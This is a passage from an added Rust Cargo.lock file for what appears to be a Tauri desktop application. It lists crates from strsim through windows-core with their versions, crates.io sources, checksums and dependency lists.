+source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "585635e46db231059f76c5849798146164652513eb9e8ab2685939dd90f29b69" +dependencies = [ + "phf_generator", + "phf_shared", + "proc-macro2", + "quote", +] + +[[package]] +name = "strsim" +version = "0.11.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7da8b5736845d9f2fcb837ea5d9e2628564b3b043a70948a3f0b778838c5fb4f" + +[[package]] +name = "swift-rs" +version = "1.0.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4057c98e2e852d51fdcfca832aac7b571f6b351ad159f9eda5db1655f8d0c4d7" +dependencies = [ + "base64 0.21.7", + "serde", + "serde_json", +] + +[[package]] +name = "syn" +version = "1.0.109" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "72b64191b275b66ffe2469e8af2c1cfe3bafa67b529ead792a6d0160888b4237" +dependencies = [ + "proc-macro2", + "unicode-ident", +] + +[[package]] +name = "syn" +version = "2.0.117" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e665b8803e7b1d2a727f4023456bbbbe74da67099c585258af0ad9c5013b9b99" +dependencies = [ + "proc-macro2", + "quote", + "unicode-ident", +] + +[[package]] +name = "sync_wrapper" +version = "1.0.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0bf256ce5efdfa370213c1dabab5935a12e49f2c58d15e9eac2870d3b4f27263" +dependencies = [ + "futures-core", +] + +[[package]] +name = "synstructure" +version = "0.13.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "728a70f3dbaf5bab7f0c4b1ac8d7ae5ea60a4b5549c8a5914361c99147a709d2" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "system-deps" +version = "6.2.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a3e535eb8dded36d55ec13eddacd30dec501792ff23a0b1682c38601b8cf2349" +dependencies = [ + "cfg-expr", + "heck 0.5.0", + "pkg-config", + "toml 0.8.2", + "version-compare", +] + +[[package]] +name = "tao" +version = "0.35.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a33f7f9e486ade65fcf1e45c440f9236c904f5c1002cdc7fc6ae582777345ce4" +dependencies = [ + "bitflags 2.11.1", + "block2", + "core-foundation", + "core-graphics", + "crossbeam-channel", + "dbus", + "dispatch2", + "dlopen2", + "dpi", + "gdkwayland-sys", + "gdkx11-sys", + "gtk", + "jni", + "libc", + "log", + "ndk", + "ndk-sys", + "objc2", + "objc2-app-kit", + "objc2-foundation", + "objc2-ui-kit", + "once_cell", + "parking_lot", + "percent-encoding", + "raw-window-handle", + "tao-macros", + "unicode-segmentation", + "url", + "windows", + "windows-core 0.61.2", + "windows-version", + "x11-dl", +] + +[[package]] +name = "tao-macros" +version = "0.1.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f4e16beb8b2ac17db28eab8bca40e62dbfbb34c0fcdc6d9826b11b7b5d047dfd" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "target-lexicon" +version = "0.12.16" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "61c41af27dd6d1e27b1b16b489db798443478cef1f06a660c96db617ba5de3b1" + +[[package]] +name = "tauri" +version = "2.11.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b93bd86d231f0a8138f11a02a584769fe4b703dc36ae133d783228dbc4801405" +dependencies = [ + "anyhow", + "bytes", + "cookie", + "dirs", + "dunce", + "embed_plist", + "getrandom 0.3.4", + "glob", + "gtk", + "heck 0.5.0", + "http", + "jni", + "libc", + "log", + "mime", + "muda", + "objc2", + "objc2-app-kit", + "objc2-foundation", + "objc2-ui-kit", + "objc2-web-kit", + "percent-encoding", + "plist", + "raw-window-handle", + "reqwest", + "serde", + "serde_json", + "serde_repr", + "serialize-to-javascript", + "swift-rs", + "tauri-build", + "tauri-macros", + "tauri-runtime", + "tauri-runtime-wry", + "tauri-utils", + "thiserror 2.0.18", + "tokio", + "tray-icon", + "url", + "webkit2gtk", + "webview2-com", + "window-vibrancy", + "windows", +] + +[[package]] +name = "tauri-build" +version = "2.6.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3a318b234cc2dea65f575467bafcfb76286bce228ebc3778e337d61d03213007" +dependencies = [ + "anyhow", + "cargo_toml", + "dirs", + "glob", + "heck 0.5.0", + "json-patch", + "schemars 0.8.22", + "semver", + "serde", + "serde_json", + "tauri-utils", + "tauri-winres", + "walkdir", +] + +[[package]] +name = "tauri-codegen" +version = "2.6.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6bd11644962add2549a60b7e7c6800f17d7020156e02f516021d8103e80cc528" +dependencies = [ + "base64 0.22.1", + "brotli", + "ico", + "json-patch", + "plist", + "png 0.17.16", + "proc-macro2", + "quote", + "semver", + "serde", + "serde_json", + "sha2", + "syn 2.0.117", + "tauri-utils", + "thiserror 2.0.18", + "time", + "url", + "uuid 1.23.1", + "walkdir", +] + +[[package]] +name = "tauri-macros" +version = "2.6.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "fed9d3742a37a355d2e47c9af924e9fbc112abb76f9835d35d4780e318419502" +dependencies = [ + "heck 0.5.0", + "proc-macro2", + "quote", + "syn 2.0.117", + "tauri-codegen", + "tauri-utils", +] + +[[package]] +name = "tauri-runtime" +version = "2.11.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8fef478ba1d2ac21c2d528740b24d0cb315e1e8b1111aae53fafac34804371fc" +dependencies = [ + "cookie", + "dpi", + "gtk", + "http", + "jni", + "objc2", + "objc2-ui-kit", + "objc2-web-kit", + "raw-window-handle", + "serde", + "serde_json", + "tauri-utils", + "thiserror 2.0.18", + "url", + "webkit2gtk", + "webview2-com", + "windows", +] + +[[package]] +name = "tauri-runtime-wry" +version = "2.11.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a3989df2ae1c476404fe0a2e8ffc4cfbde97e51efd613c2bb5355fbc9ab52cf0" +dependencies = [ + "gtk", + "http", + "jni", + "log", + "objc2", + "objc2-app-kit", + "once_cell", + "percent-encoding", + "raw-window-handle", + "softbuffer", + "tao", + "tauri-runtime", + "tauri-utils", + "url", + "webkit2gtk", + "webview2-com", + "windows", + "wry", +] + +[[package]] +name = "tauri-utils" +version = "2.9.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d57200389a2f82b4b0a40ae29ca19b6978116e8f4d4e974c3234ce40c0ffbdec" +dependencies = [ + "anyhow", + "brotli", + "cargo_metadata", + "ctor", + "dom_query", + "dunce", + "glob", + "http", + "infer", + "json-patch", + "log", + "memchr", + "phf", + "plist", + "proc-macro2", + "quote", + "regex", + "schemars 0.8.22", + "semver", + "serde", + "serde-untagged", + "serde_json", + "serde_with", + "swift-rs", + "thiserror 2.0.18", + "toml 1.1.2+spec-1.1.0", + "url", + "urlpattern", + "uuid 1.23.1", + "walkdir", +] + +[[package]] +name = "tauri-winres" +version = "0.3.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cc65d45c68858bfe420dd29e834b5d15dbecf8a07a8a16cf4d532c7b1f69d4b6" +dependencies = [ + "dunce", + "embed-resource", + "toml 1.1.2+spec-1.1.0", +] + +[[package]] +name = "tendril" +version = "0.5.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c4790fc369d5a530f4b544b094e31388b9b3a37c0f4652ade4505945f5660d24" +dependencies = [ + "new_debug_unreachable", + "utf-8", +] + +[[package]] +name = "thiserror" +version = "1.0.69" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b6aaf5339b578ea85b50e080feb250a3e8ae8cfcdff9a461c9ec2904bc923f52" +dependencies = [ + "thiserror-impl 1.0.69", +] + +[[package]] +name = "thiserror" +version = "2.0.18" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4288b5bcbc7920c07a1149a35cf9590a2aa808e0bc1eafaade0b80947865fbc4" +dependencies = [ + "thiserror-impl 2.0.18", +] + +[[package]] +name = "thiserror-impl" +version = "1.0.69" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4fee6c4efc90059e10f81e6d42c60a18f76588c3d74cb83a0b242a2b6c7504c1" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "thiserror-impl" +version = "2.0.18" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ebc4ee7f67670e9b64d05fa4253e753e016c6c95ff35b89b7941d6b856dec1d5" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "time" +version = "0.3.47" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "743bd48c283afc0388f9b8827b976905fb217ad9e647fae3a379a9283c4def2c" +dependencies = [ + "deranged", + "itoa", + "num-conv", + "powerfmt", + "serde_core", + "time-core", + "time-macros", +] + +[[package]] +name = "time-core" +version = "0.1.8" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7694e1cfe791f8d31026952abf09c69ca6f6fa4e1a1229e18988f06a04a12dca" + +[[package]] +name = "time-macros" +version = "0.2.27" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2e70e4c5a0e0a8a4823ad65dfe1a6930e4f4d756dcd9dd7939022b5e8c501215" +dependencies = [ + "num-conv", + "time-core", +] + +[[package]] +name = "tinystr" +version = "0.8.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c8323304221c2a851516f22236c5722a72eaa19749016521d6dff0824447d96d" +dependencies = [ + "displaydoc", + "zerovec", +] + +[[package]] +name = "tinyvec" +version = "1.11.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3e61e67053d25a4e82c844e8424039d9745781b3fc4f32b8d55ed50f5f667ef3" +dependencies = [ + "tinyvec_macros", +] + +[[package]] +name = "tinyvec_macros" +version = "0.1.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1f3ccbac311fea05f86f61904b462b55fb3df8837a366dfc601a0161d0532f20" + +[[package]] +name = "tokio" +version = "1.52.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8fc7f01b389ac15039e4dc9531aa973a135d7a4135281b12d7c1bc79fd57fffe" +dependencies = [ + "bytes", + "libc", + "mio", + "pin-project-lite", + "socket2", + "windows-sys 0.61.2", +] + +[[package]] +name = "tokio-util" +version = "0.7.18" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9ae9cec805b01e8fc3fd2fe289f89149a9b66dd16786abd8b19cfa7b48cb0098" +dependencies = [ + "bytes", + "futures-core", + "futures-sink", + "pin-project-lite", + "tokio", +] + +[[package]] +name = "toml" +version = "0.8.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "185d8ab0dfbb35cf1399a6344d8484209c088f75f8f68230da55d48d95d43e3d" +dependencies = [ + "serde", + "serde_spanned 0.6.9", + "toml_datetime 0.6.3", + "toml_edit 0.20.2", +] + +[[package]] +name = "toml" +version = "0.9.12+spec-1.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cf92845e79fc2e2def6a5d828f0801e29a2f8acc037becc5ab08595c7d5e9863" +dependencies = [ + "indexmap 2.14.0", + "serde_core", + "serde_spanned 1.1.1", + "toml_datetime 0.7.5+spec-1.1.0", + "toml_parser", + "toml_writer", + "winnow 0.7.15", +] + +[[package]] +name = "toml" +version = "1.1.2+spec-1.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "81f3d15e84cbcd896376e6730314d59fb5a87f31e4b038454184435cd57defee" +dependencies = [ + "indexmap 2.14.0", + "serde_core", + "serde_spanned 1.1.1", + "toml_datetime 1.1.1+spec-1.1.0", + "toml_parser", + "toml_writer", + "winnow 1.0.2", +] + +[[package]] +name = "toml_datetime" +version = "0.6.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7cda73e2f1397b1262d6dfdcef8aafae14d1de7748d66822d3bfeeb6d03e5e4b" +dependencies = [ + "serde", +] + +[[package]] +name = "toml_datetime" +version = "0.7.5+spec-1.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "92e1cfed4a3038bc5a127e35a2d360f145e1f4b971b551a2ba5fd7aedf7e1347" +dependencies = [ + "serde_core", +] + +[[package]] +name = "toml_datetime" +version = "1.1.1+spec-1.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3165f65f62e28e0115a00b2ebdd37eb6f3b641855f9d636d3cd4103767159ad7" +dependencies = [ + "serde_core", +] + +[[package]] +name = "toml_edit" +version = "0.19.15" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1b5bb770da30e5cbfde35a2d7b9b8a2c4b8ef89548a7a6aeab5c9a576e3e7421" +dependencies = [ + "indexmap 2.14.0", + "toml_datetime 0.6.3", + "winnow 0.5.40", +] + +[[package]] +name = "toml_edit" +version = "0.20.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "396e4d48bbb2b7554c944bde63101b5ae446cff6ec4a24227428f15eb72ef338" +dependencies = [ + "indexmap 2.14.0", + "serde", + "serde_spanned 0.6.9", + "toml_datetime 0.6.3", + "winnow 0.5.40", +] + +[[package]] +name = "toml_edit" +version = "0.25.11+spec-1.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0b59c4d22ed448339746c59b905d24568fcbb3ab65a500494f7b8c3e97739f2b" +dependencies = [ + "indexmap 2.14.0", + "toml_datetime 1.1.1+spec-1.1.0", + "toml_parser", + "winnow 1.0.2", +] + +[[package]] +name = "toml_parser" +version = "1.1.2+spec-1.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a2abe9b86193656635d2411dc43050282ca48aa31c2451210f4202550afb7526" +dependencies = [ + "winnow 1.0.2", +] + +[[package]] +name = "toml_writer" +version = "1.1.1+spec-1.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "756daf9b1013ebe47a8776667b466417e2d4c5679d441c26230efd9ef78692db" + +[[package]] +name = "tower" +version = "0.5.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ebe5ef63511595f1344e2d5cfa636d973292adc0eec1f0ad45fae9f0851ab1d4" +dependencies = [ + "futures-core", + "futures-util", + "pin-project-lite", + "sync_wrapper", + "tokio", + "tower-layer", + "tower-service", +] + +[[package]] +name = "tower-http" +version = "0.6.10" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "68d6fdd9f81c2819c9a8b0e0cd91660e7746a8e6ea2ba7c6b2b057985f6bcb51" +dependencies = [ + "bitflags 2.11.1", + "bytes", + "futures-util", + "http", + "http-body", + "pin-project-lite", + "tower", + "tower-layer", + "tower-service", + "url", +] + +[[package]] +name = "tower-layer" +version = "0.3.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "121c2a6cda46980bb0fcd1647ffaf6cd3fc79a013de288782836f6df9c48780e" + +[[package]] +name = "tower-service" +version = "0.3.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8df9b6e13f2d32c91b9bd719c00d1958837bc7dec474d94952798cc8e69eeec3" + +[[package]] +name = "tracing" +version = "0.1.44" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "63e71662fa4b2a2c3a26f570f037eb95bb1f85397f3cd8076caed2f026a6d100" +dependencies = [ + "pin-project-lite", + "tracing-core", +] + +[[package]] +name = "tracing-core" +version = "0.1.36" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "db97caf9d906fbde555dd62fa95ddba9eecfd14cb388e4f491a66d74cd5fb79a" +dependencies = [ + "once_cell", +] + +[[package]] +name = "tray-icon" +version = "0.23.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "15edbb0d80583e85ee8df283410038e17314df5cba30da2087a54a85216c0773" +dependencies = [ + "crossbeam-channel", + "dirs", + "libappindicator", + "muda", + "objc2", + "objc2-app-kit", + "objc2-core-foundation", + "objc2-core-graphics", + "objc2-foundation", + "once_cell", + "png 0.18.1", + "serde", + "thiserror 2.0.18", + "windows-sys 0.61.2", +] + +[[package]] +name = "try-lock" +version = "0.2.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e421abadd41a4225275504ea4d6566923418b7f05506fbc9c0fe86ba7396114b" + +[[package]] +name = "typeid" +version = "1.0.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "bc7d623258602320d5c55d1bc22793b57daff0ec7efc270ea7d55ce1d5f5471c" + +[[package]] +name = "typenum" +version = "1.20.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "40ce102ab67701b8526c123c1bab5cbe42d7040ccfd0f64af1a385808d2f43de" + +[[package]] +name = "unic-char-property" +version = "0.9.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a8c57a407d9b6fa02b4795eb81c5b6652060a15a7903ea981f3d723e6c0be221" +dependencies = [ + "unic-char-range", +] + +[[package]] +name = "unic-char-range" +version = "0.9.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0398022d5f700414f6b899e10b8348231abf9173fa93144cbc1a43b9793c1fbc" + +[[package]] +name = "unic-common" +version = "0.9.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "80d7ff825a6a654ee85a63e80f92f054f904f21e7d12da4e22f9834a4aaa35bc" + +[[package]] +name = "unic-ucd-ident" +version = "0.9.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e230a37c0381caa9219d67cf063aa3a375ffed5bf541a452db16e744bdab6987" +dependencies = [ + "unic-char-property", + "unic-char-range", + "unic-ucd-version", +] + +[[package]] +name = "unic-ucd-version" +version = "0.9.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "96bd2f2237fe450fcd0a1d2f5f4e91711124f7857ba2e964247776ebeeb7b0c4" +dependencies = [ + "unic-common", +] + +[[package]] +name = "unicode-ident" +version = "1.0.24" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e6e4313cd5fcd3dad5cafa179702e2b244f760991f45397d14d4ebf38247da75" + +[[package]] +name = "unicode-segmentation" +version = "1.13.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9629274872b2bfaf8d66f5f15725007f635594914870f65218920345aa11aa8c" + +[[package]] +name = "unicode-xid" +version = "0.2.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ebc1c04c71510c7f702b52b7c350734c9ff1295c464a03335b00bb84fc54f853" + +[[package]] +name = "url" +version = "2.5.8" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ff67a8a4397373c3ef660812acab3268222035010ab8680ec4215f38ba3d0eed" +dependencies = [ + "form_urlencoded", + "idna", + "percent-encoding", + "serde", + "serde_derive", +] + +[[package]] +name = "urlpattern" +version = "0.3.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "70acd30e3aa1450bc2eece896ce2ad0d178e9c079493819301573dae3c37ba6d" +dependencies = [ + "regex", + "serde", + "unic-ucd-ident", + "url", +] + +[[package]] +name = "utf-8" +version = "0.7.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "09cc8ee72d2a9becf2f2febe0205bbed8fc6615b7cb429ad062dc7b7ddd036a9" + +[[package]] +name = "utf8_iter" +version = "1.0.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b6c140620e7ffbb22c2dee59cafe6084a59b5ffc27a8859a5f0d494b5d52b6be" + +[[package]] +name = "uuid" +version = "0.8.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "bc5cf98d8186244414c848017f0e2676b3fcb46807f6668a97dfe67359a3c4b7" +dependencies = [ + "getrandom 0.2.17", +] + +[[package]] +name = "uuid" +version = "1.23.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ddd74a9687298c6858e9b88ec8935ec45d22e8fd5e6394fa1bd4e99a87789c76" +dependencies = [ + "getrandom 0.4.2", + "js-sys", + "serde_core", + "wasm-bindgen", +] + +[[package]] +name = "version-compare" +version = "0.2.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "03c2856837ef78f57382f06b2b8563a2f512f7185d732608fd9176cb3b8edf0e" + +[[package]] +name = "version_check" +version = "0.9.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0b928f33d975fc6ad9f86c8f283853ad26bdd5b10b7f1542aa2fa15e2289105a" + +[[package]] +name = "vswhom" +version = "0.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "be979b7f07507105799e854203b470ff7c78a1639e330a58f183b5fea574608b" +dependencies = [ + "libc", + "vswhom-sys", +] + +[[package]] +name = "vswhom-sys" +version = "0.1.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "fb067e4cbd1ff067d1df46c9194b5de0e98efd2810bbc95c5d5e5f25a3231150" +dependencies = [ + "cc", + "libc", +] + +[[package]] +name = "walkdir" +version = "2.5.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "29790946404f91d9c5d06f9874efddea1dc06c5efe94541a7d6863108e3a5e4b" +dependencies = [ + "same-file", + "winapi-util", +] + +[[package]] +name = "want" +version = "0.3.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "bfa7760aed19e106de2c7c0b581b509f2f25d3dacaf737cb82ac61bc6d760b0e" +dependencies = [ + "try-lock", +] + +[[package]] +name = "wasi" +version = "0.11.1+wasi-snapshot-preview1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ccf3ec651a847eb01de73ccad15eb7d99f80485de043efb2f370cd654f4ea44b" + +[[package]] +name = "wasip2" +version = "1.0.3+wasi-0.2.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "20064672db26d7cdc89c7798c48a0fdfac8213434a1186e5ef29fd560ae223d6" +dependencies = [ + "wit-bindgen 0.57.1", +] + +[[package]] +name = "wasip3" +version = "0.4.0+wasi-0.3.0-rc-2026-01-06" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5428f8bf88ea5ddc08faddef2ac4a67e390b88186c703ce6dbd955e1c145aca5" +dependencies = [ + "wit-bindgen 0.51.0", +] + +[[package]] +name = "wasm-bindgen" +version = "0.2.121" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "49ace1d07c165b0864824eee619580c4689389afa9dc9ed3a4c75040d82e6790" +dependencies = [ + "cfg-if", + "once_cell", + "rustversion", + "wasm-bindgen-macro", + "wasm-bindgen-shared", +] + +[[package]] +name = "wasm-bindgen-futures" +version = "0.4.71" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "96492d0d3ffba25305a7dc88720d250b1401d7edca02cc3bcd50633b424673b8" +dependencies = [ + "js-sys", + "wasm-bindgen", +] + +[[package]] +name = "wasm-bindgen-macro" +version = "0.2.121" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8e68e6f4afd367a562002c05637acb8578ff2dea1943df76afb9e83d177c8578" +dependencies = [ + "quote", + "wasm-bindgen-macro-support", +] + +[[package]] +name = "wasm-bindgen-macro-support" +version = "0.2.121" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d95a9ec35c64b2a7cb35d3fead40c4238d0940c86d107136999567a4703259f2" +dependencies = [ + "bumpalo", + "proc-macro2", + "quote", + "syn 2.0.117", + "wasm-bindgen-shared", +] + +[[package]] +name = "wasm-bindgen-shared" +version = "0.2.121" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c4e0100b01e9f0d03189a92b96772a1fb998639d981193d7dbab487302513441" +dependencies = [ + "unicode-ident", +] + +[[package]] +name = "wasm-encoder" +version = "0.244.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "990065f2fe63003fe337b932cfb5e3b80e0b4d0f5ff650e6985b1048f62c8319" +dependencies = [ + "leb128fmt", + "wasmparser", +] + +[[package]] +name = "wasm-metadata" +version = "0.244.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "bb0e353e6a2fbdc176932bbaab493762eb1255a7900fe0fea1a2f96c296cc909" +dependencies = [ + "anyhow", + "indexmap 2.14.0", + "wasm-encoder", + "wasmparser", +] + +[[package]] +name = "wasm-streams" +version = "0.5.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9d1ec4f6517c9e11ae630e200b2b65d193279042e28edd4a2cda233e46670bbb" +dependencies = [ + "futures-util", + "js-sys", + "wasm-bindgen", + "wasm-bindgen-futures", + "web-sys", +] + +[[package]] +name = "wasmparser" +version = "0.244.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "47b807c72e1bac69382b3a6fb3dbe8ea4c0ed87ff5629b8685ae6b9a611028fe" +dependencies = [ + "bitflags 2.11.1", + "hashbrown 0.15.5", + "indexmap 2.14.0", + "semver", +] + +[[package]] +name = "web-sys" +version = "0.3.98" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4b572dff8bcf38bad0fa19729c89bb5748b2b9b1d8be70cf90df697e3a8f32aa" +dependencies = [ + "js-sys", + "wasm-bindgen", +] + +[[package]] +name = "web_atoms" +version = "0.2.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d7cff6eef815df1834fd250e3a2ff436044d82a9f1bc1980ca1dbdf07effc538" +dependencies = [ + "phf", + "phf_codegen", + "string_cache", + "string_cache_codegen", +] + +[[package]] +name = "webkit2gtk" +version = "2.0.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a1027150013530fb2eaf806408df88461ae4815a45c541c8975e61d6f2fc4793" +dependencies = [ + "bitflags 1.3.2", + "cairo-rs", + "gdk", + "gdk-sys", + "gio", + "gio-sys", + "glib", + "glib-sys", + "gobject-sys", + "gtk", + "gtk-sys", + "javascriptcore-rs", + "libc", + "once_cell", + "soup3", + "webkit2gtk-sys", +] + +[[package]] +name = "webkit2gtk-sys" +version = "2.0.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "916a5f65c2ef0dfe12fff695960a2ec3d4565359fdbb2e9943c974e06c734ea5" +dependencies = [ + "bitflags 1.3.2", + "cairo-sys-rs", + "gdk-sys", + "gio-sys", + "glib-sys", + "gobject-sys", + "gtk-sys", + "javascriptcore-rs-sys", + "libc", + "pkg-config", + "soup3-sys", + "system-deps", +] + +[[package]] +name = "webview2-com" +version = "0.38.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7130243a7a5b33c54a444e54842e6a9e133de08b5ad7b5861cd8ed9a6a5bc96a" +dependencies = [ + "webview2-com-macros", + "webview2-com-sys", + "windows", + "windows-core 0.61.2", + "windows-implement", + "windows-interface", +] + +[[package]] +name = "webview2-com-macros" +version = "0.8.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "67a921c1b6914c367b2b823cd4cde6f96beec77d30a939c8199bb377cf9b9b54" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "webview2-com-sys" +version = "0.38.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "381336cfffd772377d291702245447a5251a2ffa5bad679c99e61bc48bacbf9c" +dependencies = [ + "thiserror 2.0.18", + "windows", + "windows-core 0.61.2", +] + +[[package]] +name = "winapi" +version = "0.3.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" +dependencies = [ + "winapi-i686-pc-windows-gnu", + "winapi-x86_64-pc-windows-gnu", +] + +[[package]] +name = "winapi-i686-pc-windows-gnu" +version = "0.4.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" + +[[package]] +name = "winapi-util" +version = "0.1.11" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22" +dependencies = [ + "windows-sys 0.61.2", +] + +[[package]] +name = "winapi-x86_64-pc-windows-gnu" +version = "0.4.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" + +[[package]] +name = "window-vibrancy" +version = "0.6.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d9bec5a31f3f9362f2258fd0e9c9dd61a9ca432e7306cc78c444258f0dce9a9c" +dependencies = [ + "objc2", + "objc2-app-kit", + "objc2-core-foundation", + "objc2-foundation", + "raw-window-handle", + "windows-sys 0.59.0", + "windows-version", +] + +[[package]] +name = "windows" +version = "0.61.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9babd3a767a4c1aef6900409f85f5d53ce2544ccdfaa86dad48c91782c6d6893" +dependencies = [ + "windows-collections", + "windows-core 0.61.2", + "windows-future", + "windows-link 0.1.3", + "windows-numerics", +] + +[[package]] +name = "windows-collections" +version = "0.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3beeceb5e5cfd9eb1d76b381630e82c4241ccd0d27f1a39ed41b2760b255c5e8" +dependencies = [ + "windows-core 0.61.2", +] + +[[package]] +name = "windows-core" +version = "0.61.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c0fdd3ddb90610c7638aa2b3a3ab2904fb9e5cdbecc643ddb3647212781c4ae3" +dependencies = [ + "windows-implement", + "windows-interface", + "windows-link 0.1.3", + "windows-result 0.3.4", + "windows-strings 0.4.2", +] + +[[package]] +name = "windows-core" +version = "0.62.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b8e83a14d34d0623b51dce9581199302a221863196a1dde71a7663a4c2be9deb" +dependencies = [ + "windows-implement", + "windows-interface", + "windows-link 